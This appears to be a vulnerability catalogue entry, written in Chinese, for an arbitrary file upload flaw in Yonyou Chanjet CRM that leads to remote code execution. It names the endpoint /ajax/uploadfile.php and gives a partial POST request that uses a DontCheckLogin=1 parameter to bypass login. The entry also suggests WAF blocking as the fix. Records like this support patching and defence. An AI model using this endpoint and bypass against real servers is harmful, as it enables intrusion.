vendor = "用友"
name = "用友-畅捷通CRM-任意文件上传"
type = "RCE"
version = "未知"
path = "/ajax/uploadfile.php"
detail = "POST /ajax/uploadfile.php?DontCheckLogin=1&vname=file HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0"
fix = "WAF封禁路路径，等待发布补丁"
date = "0726"
label = "nday"
